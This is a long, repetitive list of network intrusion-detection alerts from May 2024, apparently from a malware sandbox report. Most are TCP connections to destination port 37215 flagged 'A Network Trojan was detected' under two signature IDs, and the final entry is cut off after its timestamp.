              Timestamp:05/24/24-10:58:56.127519
              SID:2835222
              Source Port:43280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519537
              SID:2835222
              Source Port:39992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432256
              SID:2835222
              Source Port:42880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.376271
              SID:2835222
              Source Port:58322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480444
              SID:2829579
              Source Port:54404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460577
              SID:2835222
              Source Port:57862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.472912
              SID:2829579
              Source Port:54230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063873
              SID:2835222
              Source Port:36072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101531
              SID:2835222
              Source Port:58842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517825
              SID:2829579
              Source Port:52802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385495
              SID:2829579
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971034
              SID:2835222
              Source Port:47600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443966
              SID:2829579
              Source Port:44964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358459
              SID:2835222
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575295
              SID:2835222
              Source Port:45164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110775
              SID:2835222
              Source Port:54846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361033
              SID:2829579
              Source Port:43332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538261
              SID:2829579
              Source Port:59196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100809
              SID:2835222
              Source Port:45894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157523
              SID:2835222
              Source Port:40976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491435
              SID:2835222
              Source Port:38454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269166
              SID:2829579
              Source Port:42974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125426
              SID:2829579
              Source Port:42958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771766
              SID:2829579
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517462
              SID:2835222
              Source Port:36266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486052
              SID:2829579
              Source Port:51850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538244
              SID:2835222
              Source Port:56836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049726
              SID:2835222
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483645
              SID:2835222
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449259
              SID:2829579
              Source Port:33920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283407
              SID:2829579
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918306
              SID:2829579
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575325
              SID:2829579
              Source Port:47162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525289
              SID:2829579
              Source Port:38646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638258
              SID:2829579
              Source Port:47000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693221
              SID:2829579
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062222
              SID:2835222
              Source Port:43388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129694
              SID:2835222
              Source Port:37122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070781
              SID:2829579
              Source Port:38746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.354996
              SID:2835222
              Source Port:33376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041247
              SID:2835222
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205270
              SID:2829579
              Source Port:48740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978045
              SID:2835222
              Source Port:37018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868671
              SID:2835222
              Source Port:45086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880304
              SID:2829579
              Source Port:50806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452629
              SID:2829579
              Source Port:60048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121277
              SID:2835222
              Source Port:53708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061771
              SID:2829579
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481889
              SID:2829579
              Source Port:56006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434540
              SID:2829579
              Source Port:47856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302915
              SID:2829579
              Source Port:34048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167390
              SID:2829579
              Source Port:49564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303340
              SID:2835222
              Source Port:55750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063873
              SID:2829579
              Source Port:48294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605837
              SID:2835222
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481500
              SID:2829579
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383270
              SID:2835222
              Source Port:37962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502307
              SID:2835222
              Source Port:37842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870338
              SID:2835222
              Source Port:39860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101301
              SID:2835222
              Source Port:38658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120500
              SID:2835222
              Source Port:37318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157560
              SID:2835222
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345322
              SID:2829579
              Source Port:49760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152875
              SID:2829579
              Source Port:41690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365339
              SID:2829579
              Source Port:53634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836390
              SID:2829579
              Source Port:60664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125315
              SID:2835222
              Source Port:58952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484371
              SID:2835222
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128248
              SID:2829579
              Source Port:52806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520217
              SID:2835222
              Source Port:51252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059806
              SID:2835222
              Source Port:40804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548202
              SID:2835222
              Source Port:59292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070957
              SID:2835222
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317980
              SID:2829579
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148457
              SID:2829579
              Source Port:43342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457888
              SID:2829579
              Source Port:57988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233431
              SID:2835222
              Source Port:39870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486005
              SID:2829579
              Source Port:47298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.676397
              SID:2829579
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702323
              SID:2835222
              Source Port:45452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411283
              SID:2835222
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116960
              SID:2829579
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507221
              SID:2829579
              Source Port:37188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581984
              SID:2835222
              Source Port:35114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535533
              SID:2835222
              Source Port:45222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118297
              SID:2829579
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492364
              SID:2829579
              Source Port:46170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502830
              SID:2829579
              Source Port:59556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458300
              SID:2829579
              Source Port:40022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233559
              SID:2835222
              Source Port:58080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682413
              SID:2835222
              Source Port:59262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186456
              SID:2835222
              Source Port:41554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164502
              SID:2835222
              Source Port:33304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681326
              SID:2835222
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055432
              SID:2829579
              Source Port:54592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130251
              SID:2835222
              Source Port:48744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.294164
              SID:2030490
              Source Port:36676
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448679
              SID:2829579
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418933
              SID:2829579
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078767
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833060
              SID:2829579
              Source Port:56394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552371
              SID:2835222
              Source Port:34038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607058
              SID:2835222
              Source Port:44552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856728
              SID:2835222
              Source Port:55698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053839
              SID:2829579
              Source Port:55796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484638
              SID:2835222
              Source Port:47884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114588
              SID:2829579
              Source Port:56524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661339
              SID:2829579
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189438
              SID:2829579
              Source Port:39780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489325
              SID:2835222
              Source Port:47480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860009
              SID:2835222
              Source Port:55902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431263
              SID:2835222
              Source Port:41284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045462
              SID:2829579
              Source Port:44882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459944
              SID:2829579
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358873
              SID:2829579
              Source Port:52204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070960
              SID:2835222
              Source Port:36238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576547
              SID:2835222
              Source Port:54870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156303
              SID:2835222
              Source Port:41210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538124
              SID:2835222
              Source Port:53888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574746
              SID:2829579
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278901
              SID:2829579
              Source Port:58778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505838
              SID:2835222
              Source Port:53738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390582
              SID:2835222
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625196
              SID:2829579
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424260
              SID:2835222
              Source Port:45894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067265
              SID:2829579
              Source Port:34736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396740
              SID:2829579
              Source Port:52390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802580
              SID:2835222
              Source Port:46602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625716
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756171
              SID:2829579
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918397
              SID:2835222
              Source Port:52382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116560
              SID:2835222
              Source Port:35050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755718
              SID:2829579
              Source Port:42012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267148
              SID:2829579
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269355
              SID:2835222
              Source Port:59612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447260
              SID:2829579
              Source Port:59434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535996
              SID:2829579
              Source Port:46616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698249
              SID:2835222
              Source Port:36694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575288
              SID:2835222
              Source Port:52994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924109
              SID:2829579
              Source Port:40812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097803
              SID:2829579
              Source Port:43558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545453
              SID:2829579
              Source Port:35778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113610
              SID:2829579
              Source Port:32874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597883
              SID:2835222
              Source Port:45924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188077
              SID:2835222
              Source Port:36066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874715
              SID:2835222
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552432
              SID:2835222
              Source Port:36784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209553
              SID:2835222
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361327
              SID:2829579
              Source Port:33762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857393
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078329
              SID:2829579
              Source Port:54964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536577
              SID:2835222
              Source Port:56024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878802
              SID:2835222
              Source Port:41252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507103
              SID:2829579
              Source Port:49138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252947
              SID:2835222
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401561
              SID:2829579
              Source Port:40272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485497
              SID:2835222
              Source Port:33368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486505
              SID:2835222
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703452
              SID:2829579
              Source Port:53018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486134
              SID:2835222
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076954
              SID:2835222
              Source Port:33110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802540
              SID:2829579
              Source Port:55046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308875
              SID:2829579
              Source Port:54122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397901
              SID:2829579
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117136
              SID:2829579
              Source Port:48274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639473
              SID:2829579
              Source Port:46896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507083
              SID:2835222
              Source Port:52876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638158
              SID:2829579
              Source Port:46258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575558
              SID:2829579
              Source Port:41250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166855
              SID:2835222
              Source Port:33196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520237
              SID:2835222
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640497
              SID:2835222
              Source Port:36172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286781
              SID:2835222
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332146
              SID:2835222
              Source Port:45126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156370
              SID:2835222
              Source Port:55520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329538
              SID:2835222
              Source Port:49220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457680
              SID:2829579
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234477
              SID:2829579
              Source Port:43930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535155
              SID:2829579
              Source Port:40302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286021
              SID:2835222
              Source Port:43886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856897
              SID:2829579
              Source Port:40744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771819
              SID:2829579
              Source Port:42926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506731
              SID:2835222
              Source Port:56544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195268
              SID:2835222
              Source Port:48356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489740
              SID:2835222
              Source Port:49114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234569
              SID:2835222
              Source Port:40024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799188
              SID:2829579
              Source Port:59856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481874
              SID:2829579
              Source Port:34532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391620
              SID:2829579
              Source Port:40576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123784
              SID:2835222
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481876
              SID:2829579
              Source Port:46458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575477
              SID:2835222
              Source Port:49416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234683
              SID:2829579
              Source Port:41986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162931
              SID:2829579
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446400
              SID:2829579
              Source Port:42838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741305
              SID:2835222
              Source Port:34572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101616
              SID:2829579
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456432
